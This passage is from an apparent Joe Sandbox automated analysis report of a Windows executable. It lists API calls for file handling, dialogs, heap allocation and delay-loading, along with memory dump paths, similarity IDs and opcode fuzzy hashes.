    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00047ED0,?,?,?,00000000), ref: 0004B04C
    • SetFileTime.KERNEL32(?,?,?,?), ref: 0004B100
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: File$BuffersFlushTime
    • String ID:
    • API String ID: 1392018926-0
    • Opcode ID: 774157747b4dc2a7fcde93b26b48f8bd96f7811a1ce6601a2492ca0c858f2b71
    • Instruction ID: 2a31fa5323d7eca3df331855a4cc5a5e64fcb2629ab9f22b8bb2ffb2022192d0
    • Opcode Fuzzy Hash: 774157747b4dc2a7fcde93b26b48f8bd96f7811a1ce6601a2492ca0c858f2b71
    • Instruction Fuzzy Hash: 8B212371248341EFC724DF74C891AABBBE4AF96306F04492CF4E183141D729E90CDB66
    APIs
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0004B1B7,?,?,000481FD), ref: 0004A946
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0004B1B7,?,?,000481FD), ref: 0004A976
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: 4578682801949b6d4d96eb76d906774152199d035e9a50d31896a41d09665ac9
    • Instruction ID: 6a6f879303c0903dca797e36a16fca3b033988d03bd5c028a8a8213bf121b55a
    • Opcode Fuzzy Hash: 4578682801949b6d4d96eb76d906774152199d035e9a50d31896a41d09665ac9
    • Instruction Fuzzy Hash: 2D21D0B1644344AEE3B08A65CC88FF776DCEB4A321F010A2DF9D5C21D2C778AC858672
    APIs
    • FreeLibrary.KERNEL32(00000000,?,000A40C4,?,?,?,00064EE6,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx,00000000,?,00064C9D,000A40C4,00000FA0), ref: 00064D75
    • GetProcAddress.KERNEL32(00000000,?), ref: 00064D7F
    Similarity
    • API ID: AddressFreeLibraryProc
    • String ID:
    • API String ID: 3013587201-0
    • Opcode ID: bd17c5732fe983631bfe7181ed23e3c61f604fc551f5bd5ad4a0649365f99655
    • Instruction ID: d9456b46798db08ec7a827485b7c3e23ea23d2e8455c48a7fa11d9446b48726a
    • Opcode Fuzzy Hash: bd17c5732fe983631bfe7181ed23e3c61f604fc551f5bd5ad4a0649365f99655
    • Instruction Fuzzy Hash: 34118E35A00515EF9F22CFA4E8809AA73E6FB86750B250269EA05E7250E730DD41CB90
    APIs
    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 0004B157
    • GetLastError.KERNEL32 ref: 0004B164
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 0523078c299fab0ceaeb2ece1a3dd177ebdd85b2a5ccb0e9ad46176f2bd97628
    • Instruction ID: 1acb60d4fdfbf2055dbf19dbe37630f7697317f4925bf3dd20a120f4e7be8288
    • Opcode Fuzzy Hash: 0523078c299fab0ceaeb2ece1a3dd177ebdd85b2a5ccb0e9ad46176f2bd97628
    • Instruction Fuzzy Hash: 901108B1640700EBE7359624CC64BAAB3E9BB44370FA04B3DE552931E0D774ED45C754
    APIs
    • _free.LIBCMT ref: 0006A6B5
      • Part of subcall function 0006A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006DBDC,00000000,?,000680A1,?,00000008,?,0006A861,?,?,?), ref: 0006A820
    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,000830C4,0004187A,?,?,00000007,?,?,?,000413F2,?,00000000), ref: 0006A6F1
    Similarity
    • API ID: Heap$AllocAllocate_free
    • String ID:
    • API String ID: 2447670028-0
    • Opcode ID: 10ee793a6e68fe63d234b790d713317f0cbd9ebbd6f8323a94071ba7e8923f15
    • Instruction ID: 066719c12209d8d4166b7d53aadaac6e776cab33d2f33a5651b32db753c352c2
    • Opcode Fuzzy Hash: 10ee793a6e68fe63d234b790d713317f0cbd9ebbd6f8323a94071ba7e8923f15
    • Instruction Fuzzy Hash: 85F0C231304114A6DB213A26EC00AAF279B9FC37B0B194115F81AB60A2DB309C009D67
    APIs
    • GetCurrentProcess.KERNEL32(?,?), ref: 000523C3
    • GetProcessAffinityMask.KERNEL32(00000000), ref: 000523CA
    Similarity
    • API ID: Process$AffinityCurrentMask
    • String ID:
    • API String ID: 1231390398-0
    • Opcode ID: 4b9281331909d90407c0457becb89eb3320febc85ddf31955bc6a4ec81fad327
    • Instruction ID: 31fb859831ec6c66b71ab3a59cf7625d77662c0a021b629d991c81a54486a6f7
    • Opcode Fuzzy Hash: 4b9281331909d90407c0457becb89eb3320febc85ddf31955bc6a4ec81fad327
    • Instruction Fuzzy Hash: 05E09232F00105A7DF0987A49C459EB76DCEF552463248175A903E3100EA7CDE4946A0
    APIs
    • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B8FA
      • Part of subcall function 0004CF32: _wcslen.LIBCMT ref: 0004CF56
    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B92B
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: e3f1084ca5132c5e1e32ad41c551aa558adec2c2afb10362fc9c39f328725dc5
    • Instruction ID: 6648eaf44f34b47f796ca93e93d75a8dc07be67fa97f0813db90c26011be18ee
    • Opcode Fuzzy Hash: e3f1084ca5132c5e1e32ad41c551aa558adec2c2afb10362fc9c39f328725dc5
    • Instruction Fuzzy Hash: 07F0853150420ABBEB115FA08C00BEA37ACAB083C5F008061BA48E6161DB39DDA89A60
    APIs
    • DeleteFileW.KERNEL32(?,00000000,?,0004A438,?,?,?,?,0004892B,?,?,?,000737FF,000000FF), ref: 0004B481
      • Part of subcall function 0004CF32: _wcslen.LIBCMT ref: 0004CF56
    • DeleteFileW.KERNEL32(?,?,?,00000800,?,0004A438,?,?,?,?,0004892B,?,?,?,000737FF,000000FF), ref: 0004B4AF
    Similarity
    • API ID: DeleteFile$_wcslen
    • String ID:
    • API String ID: 2643169976-0
    • Opcode ID: c212d09911d7032b8a373da6c0f0d00d3e24ea6eabe86c4f3430e9eb7274e223
    • Instruction ID: 7bc85e0925ac653795212d5af79ccd1e071d52b0df919ef416255dd0665f7609
    • Opcode Fuzzy Hash: c212d09911d7032b8a373da6c0f0d00d3e24ea6eabe86c4f3430e9eb7274e223
    • Instruction Fuzzy Hash: 5CE092725442196BEB015B60CC45FEA379DBF04382F444031BE49D20A2DB78EDC99A54
    APIs
    • GdiplusShutdown.GDIPLUS(?,?,?,?,000737FF,000000FF), ref: 0005BDA5
    • CoUninitialize.COMBASE(?,?,?,?,000737FF,000000FF), ref: 0005BDAA
    Similarity
    • API ID: GdiplusShutdownUninitialize
    • String ID:
    • API String ID: 3856339756-0
    • Opcode ID: f234384bd0d6693863bff543fbbd0a95c9462639d23c259ae1eddfca6a86260c
    • Instruction ID: 4ab5ee4639fe57e3b7b4594dd8c3a12c18b7c44fd78674ae1561100f3e602ec3
    • Opcode Fuzzy Hash: f234384bd0d6693863bff543fbbd0a95c9462639d23c259ae1eddfca6a86260c
    • Instruction Fuzzy Hash: 92E06572604951EFD7119B48DC05B59FBA9FB89B20F004226B41593761CB7C6801CA90
    APIs
    • GetFileAttributesW.KERNEL32(?,?,?,0004B4CA,?,00048042,?), ref: 0004B4E4
      • Part of subcall function 0004CF32: _wcslen.LIBCMT ref: 0004CF56
    • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,?,0004B4CA,?,00048042,?), ref: 0004B510
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: fc431af5e10faebbccb4da55e177db8332d94ef5c4330eab6bac50575deac4e8
    • Instruction ID: c3d9f81000bc5b493a88c31fd73129e8526c5eb6d0d75edc7cc88d931689231d
    • Opcode Fuzzy Hash: fc431af5e10faebbccb4da55e177db8332d94ef5c4330eab6bac50575deac4e8
    • Instruction Fuzzy Hash: 4AE0D8719002286BDB60AB68DC04BD9779CBB093E2F010170FE49E3191D778DD848BD4
    APIs
    • _swprintf.LIBCMT ref: 0005F01C
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • SetDlgItemTextW.USER32(00000065,?), ref: 0005F033
      • Part of subcall function 0005C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C759
      • Part of subcall function 0005C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0005C76A
      • Part of subcall function 0005C748: IsDialogMessageW.USER32(00010468,?), ref: 0005C77E
      • Part of subcall function 0005C748: TranslateMessage.USER32(?), ref: 0005C78C
      • Part of subcall function 0005C748: DispatchMessageW.USER32(?), ref: 0005C796
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekTextTranslateUser__vswprintf_c_l_swprintf
    • String ID:
    • API String ID: 3954729096-0
    • Opcode ID: c7a26f5495b75925de3ea7efa4054f8bd439aa6d5103ac818966f4735e893f64
    • Instruction ID: 92dde84ea04e899555ff8b19effd682d5e72dae26d52095a7cdb50c721adbd36
    • Opcode Fuzzy Hash: c7a26f5495b75925de3ea7efa4054f8bd439aa6d5103ac818966f4735e893f64
    • Instruction Fuzzy Hash: DBE09B7551424C36FF016765DC0AFEB365C7B0538AF040462B641D64A3D67899158B66
    APIs
    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B4F
    • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00050633,Crypt32.dll,00000000,000506AD,00000200,?,00050690,00000000,00000000,?), ref: 00051B71
    Similarity
    • API ID: DirectoryLibraryLoadSystem
    • String ID:
    • API String ID: 1175261203-0
    • Opcode ID: 75482fd34c958742159fff0b386dfac3e408c0846f5aa2d7020666718152a0c5
    • Instruction ID: 5c275e7f1c52f985985b4ca5c22a384116f565a8bdd0430ee141785c05a27b51
    • Opcode Fuzzy Hash: 75482fd34c958742159fff0b386dfac3e408c0846f5aa2d7020666718152a0c5
    • Instruction Fuzzy Hash: 51E048769002286AEB11A7A4DC08FDB77ACEF093C2F044075BA49E2045DB78DA84CBF0
    APIs
    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005B3D9
    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0005B3E0
    Similarity
    • API ID: BitmapCreateFromGdipStream
    • String ID:
    • API String ID: 1918208029-0
    • Opcode ID: 61b2769bbea457aa5e7d94d6b7a3bce3827b9ce9d434fd787fac3d78efcd5629
    • Instruction ID: a6bb8ec2f7ff64f194d10c78801196762bad22b35cf9666648446bf356e3e3b5
    • Opcode Fuzzy Hash: 61b2769bbea457aa5e7d94d6b7a3bce3827b9ce9d434fd787fac3d78efcd5629
    • Instruction Fuzzy Hash: D7E0ED71905618EBDB54DF59C9417DEB7F8EB04352F20806AE855A3601D3B8AF089B61
    APIs
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00063D2A
    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00063D35
    Similarity
    • API ID: Value___vcrt____vcrt_uninitialize_ptd
    • String ID:
    • API String ID: 1660781231-0
    • Opcode ID: e2ffb7dc79709d7acfd63dffc447b2e6df3e80405892eb485ae69dd1192e75fb
    • Instruction ID: 11d5956c0f5fa996c6fa4dcee7ec5353d78ee3aa77bdc7658edaaa4a0f129faa
    • Opcode Fuzzy Hash: e2ffb7dc79709d7acfd63dffc447b2e6df3e80405892eb485ae69dd1192e75fb
    • Instruction Fuzzy Hash: 31D02235C08B1408EC6426B438024DB13CBAF137B5BA02746F630CA0C3EE2187043693
    APIs
    Similarity
    • API ID: ItemShowWindow
    • String ID:
    • API String ID: 3351165006-0
    • Opcode ID: a4675c79ac4f0faf112bf6b971a5b3f2c047ec3c79647b4a716c1007ae5a79a2
    • Instruction ID: 93e822fa390e942f4afb379a74d0e5d00cc934c31994f0c431e0bf511888371c
    • Opcode Fuzzy Hash: a4675c79ac4f0faf112bf6b971a5b3f2c047ec3c79647b4a716c1007ae5a79a2
    • Instruction Fuzzy Hash: 6DC01232158A00BEDB010BB0DC09E3ABBA8BBAA212F10CA08F0A6C1060C23DC010DB11
    APIs
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: cd43d2c586453fcd24ad483ede0afcc3f73e7029094c987fef33f38353fcadbb
    • Instruction ID: 070881fae0d5b0a8c088f2f365f8447a4fcec6d602ff9be33973ab0ee9ba98b2
    • Opcode Fuzzy Hash: cd43d2c586453fcd24ad483ede0afcc3f73e7029094c987fef33f38353fcadbb
    • Instruction Fuzzy Hash: 18C191B4A402549BDF65CF28C8C47ED7BE5AF4A310F1801B9EC059B297CB349AC5CB69
    APIs
    • __EH_prolog.LIBCMT ref: 000490A7
      • Part of subcall function 000413F8: __EH_prolog.LIBCMT ref: 000413FD
      • Part of subcall function 00042032: __EH_prolog.LIBCMT ref: 00042037
      • Part of subcall function 0004B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0004B991
    Similarity
    • API ID: H_prolog$CloseFind
    • String ID:
    • API String ID: 2506663941-0
    • Opcode ID: 274db8acdf95fc0785b7e180772750dc20824054b6e2a5836f2d72b718f2b1ff
    • Instruction ID: 16151edd22795081a72d8cd720da804b9de8fa674f27a05312e1e06060cd7c02
    • Opcode Fuzzy Hash: 274db8acdf95fc0785b7e180772750dc20824054b6e2a5836f2d72b718f2b1ff
    • Instruction Fuzzy Hash: F64177B19042145ADB24DB60C8A5AEB73B9AF10340F4405FAF54A67093DBB55F89CF15
    APIs
    • __EH_prolog.LIBCMT ref: 000413FD
      • Part of subcall function 00046891: __EH_prolog.LIBCMT ref: 00046896
      • Part of subcall function 0004E298: __EH_prolog.LIBCMT ref: 0004E29D
      • Part of subcall function 0004644D: __EH_prolog.LIBCMT ref: 00046452
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: fa1004f6e4a7843d2aabe97e875e8d02c5f02f95494aaa82e081c6d886f589d4
    • Instruction ID: 03344e43dfdd4b42205e36ebf69225e189609638f820097f98e932cb7336e335
    • Opcode Fuzzy Hash: fa1004f6e4a7843d2aabe97e875e8d02c5f02f95494aaa82e081c6d886f589d4
    • Instruction Fuzzy Hash: E15138B1A0A3808ECB14DF2994802D9BBE5AF59300F0802BEEC5DCF69BD7755254CB66
    APIs
    • __EH_prolog.LIBCMT ref: 000413FD
      • Part of subcall function 00046891: __EH_prolog.LIBCMT ref: 00046896
      • Part of subcall function 0004E298: __EH_prolog.LIBCMT ref: 0004E29D
      • Part of subcall function 0004644D: __EH_prolog.LIBCMT ref: 00046452
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 6896a5617c0c4a412cc3566229fb5b5f1f7a7586b723259a2b8dd4aa4d00a20d
    • Instruction ID: 04f9bda19b260bb24929bc6ca1b2550cf096d47e49fdf34875f379f7a97b379e
    • Opcode Fuzzy Hash: 6896a5617c0c4a412cc3566229fb5b5f1f7a7586b723259a2b8dd4aa4d00a20d
    • Instruction Fuzzy Hash: B85167B190A3808EDB14DF2994802D9BBE5BF5A300F0802BEEC4DCF28BD7755254CB66
    APIs
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • __EH_prolog.LIBCMT ref: 0005C20C
      • Part of subcall function 000413F8: __EH_prolog.LIBCMT ref: 000413FD
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • GetProcAddress.KERNEL32(00000000,00074ADC), ref: 0006BEA8
    Similarity
    • API ID: AddressProc
    • String ID:
    • API String ID: 190572456-0
    APIs
    • __EH_prolog.LIBCMT ref: 00048828
      • Part of subcall function 0004E298: __EH_prolog.LIBCMT ref: 0004E29D
      • Part of subcall function 000533D4: __EH_prolog.LIBCMT ref: 000533D9
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • __EH_prolog.LIBCMT ref: 0004E29D
      • Part of subcall function 00046891: __EH_prolog.LIBCMT ref: 00046896
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • __EH_prolog.LIBCMT ref: 0005EB97
      • Part of subcall function 0005197C: _wcslen.LIBCMT ref: 00051992
      • Part of subcall function 00048823: __EH_prolog.LIBCMT ref: 00048828
    Similarity
    • API ID: H_prolog$_wcslen
    • String ID:
    • API String ID: 2838827086-0
    APIs
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006DBDC,00000000,?,000680A1,?,00000008,?,0006A861,?,?,?), ref: 0006A820
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    APIs
      • Part of subcall function 0004BA94: FindFirstFileW.KERNEL32(?,?,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BABD
      • Part of subcall function 0004BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BAEB
      • Part of subcall function 0004BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BAF7
    • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0004B991
    Similarity
    • API ID: Find$FileFirst$CloseErrorLast
    • String ID:
    • API String ID: 1464966427-0
    APIs
    • SetThreadExecutionState.KERNEL32(00000001), ref: 00052156
    Similarity
    • API ID: ExecutionStateThread
    • String ID:
    • API String ID: 2211380416-0
    APIs
    • GdipAlloc.GDIPLUS(00000010), ref: 0005B62C
      • Part of subcall function 0005B3B8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005B3D9
    Similarity
    • API ID: Gdip$AllocBitmapCreateFromStream
    • String ID:
    • API String ID: 1915507550-0
    APIs
    • __EH_prolog.LIBCMT ref: 00046925
      • Part of subcall function 000504E5: __EH_prolog.LIBCMT ref: 000504EA
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • DloadProtectSection.DELAYIMP ref: 0005F75F
    Similarity
    • API ID: DloadProtectSection
    • String ID:
    • API String ID: 2203082970-0
    APIs
    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00052E78), ref: 0005EED2
      • Part of subcall function 0005C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C759
      • Part of subcall function 0005C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0005C76A
      • Part of subcall function 0005C748: IsDialogMessageW.USER32(00010468,?), ref: 0005C77E
      • Part of subcall function 0005C748: TranslateMessage.USER32(?), ref: 0005C78C
      • Part of subcall function 0005C748: DispatchMessageW.USER32(?), ref: 0005C796
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekSendTranslateUser
    • String ID:
    • API String ID: 3453300979-0
    APIs
    • GetFileType.KERNEL32(000000FF,0004AA1E), ref: 0004AB28
    Similarity
    • API ID: FileType
    • String ID:
    • API String ID: 3081899298-0
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: c2ab19f628fa87b6be7da41f5843e5f9da2aab31c100497daf624934dd111e03
    • Instruction ID: ce45677bde6db3de6719f46a6030d6c922ceb6cccea77df7a7716179bda0dfb1
    • Opcode Fuzzy Hash: c2ab19f628fa87b6be7da41f5843e5f9da2aab31c100497daf624934dd111e03
    • Instruction Fuzzy Hash: 39B012892686037C37C461547C02E3B026DC7C0B13330813FF807C4441D84C0D486032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 196475a01230ffc1821e5102f376502d11b02d89a27e766d2a8079f8409fa473
    • Instruction ID: 072936aeef1c47143789e1bb5c5478b67a7c5d304e4e5ad631a7eee128006313
    • Opcode Fuzzy Hash: 196475a01230ffc1821e5102f376502d11b02d89a27e766d2a8079f8409fa473
    • Instruction Fuzzy Hash: 4FB012892685037C338461547C02E3B022DD7C0B13370803FF807C4441D84C0D082132
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 789f642cb6549afbbc16e5dc76c782f3275c59bc6fff56373f594869cc4d85f3
    • Instruction ID: 730ac1bbe861e19d6707b2615931fa4f98c901f3987db0aeea9a3e3cb5f8a176
    • Opcode Fuzzy Hash: 789f642cb6549afbbc16e5dc76c782f3275c59bc6fff56373f594869cc4d85f3
    • Instruction Fuzzy Hash: E7B092852684036C338461546C02A3B0229C7C1B12330C02BB806C4142E84809092032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3ace68feb84ebe064b1bef3fd5262b62c16547f6efdabe1774bcfc04e8582972
    • Instruction ID: 83eb2bc023156b673a25ee186bd3e886d75cc84d2d000256eb40ef53fa6d155b
    • Opcode Fuzzy Hash: 3ace68feb84ebe064b1bef3fd5262b62c16547f6efdabe1774bcfc04e8582972
    • Instruction Fuzzy Hash: BFB012852685037C33C461547C02E3B022DC7C0B13330C13FF807C4141E84C0D4C2032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0c05e8e9e12171f922270f4f8d982424987bf9325020cace071bebdb0f97efc1
    • Instruction ID: 9256fad8c18e32ec5923f3a72ee490704742e27aec56ed45949e44f5bd5abf09
    • Opcode Fuzzy Hash: 0c05e8e9e12171f922270f4f8d982424987bf9325020cace071bebdb0f97efc1
    • Instruction Fuzzy Hash: FEB012853A84037C338461547D02E3B022DC7C0B13330C03FF807C8141E89C0E0D2032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a9add3418e48bd0eab4f58b41043c5e853861d9c7107173fe1790dc05fae09bf
    • Instruction ID: 5cbf6886ef527cfbbec71b6d270b4b8f4c72f5641dfae21209ba42adc8491d94
    • Opcode Fuzzy Hash: a9add3418e48bd0eab4f58b41043c5e853861d9c7107173fe1790dc05fae09bf
    • Instruction Fuzzy Hash: 4AB012852684037C338461947C02E3B032DD7C0B13370C43FF807C4141E84C0D0C2032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9b38546af2e02480f5dc41955789e5c1b3cb64f17df9b9f05dc6b34c9a6a062c
    • Instruction ID: 6987e942d37e245ea194748d08716da5cfd800b22f2dbf38a0c24a3995f1f3df
    • Opcode Fuzzy Hash: 9b38546af2e02480f5dc41955789e5c1b3cb64f17df9b9f05dc6b34c9a6a062c
    • Instruction Fuzzy Hash: 4CB092952684036C338461546C02A3B0229C781B12330802BB806C4042D8480A092032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 50ee986a26bdb0b429bee76bf3515dbf57e4df58a6686e1a02fc6aecb98b0d8e
    • Instruction ID: 8c807d22f6112dd47e6ad8de3991495b3ed5eea8176d1b38d35cb6931952d74e
    • Opcode Fuzzy Hash: 50ee986a26bdb0b429bee76bf3515dbf57e4df58a6686e1a02fc6aecb98b0d8e
    • Instruction Fuzzy Hash: D9B092952684036C338461546D02A3B0229C780B12330802BB807C8041D8880A092032
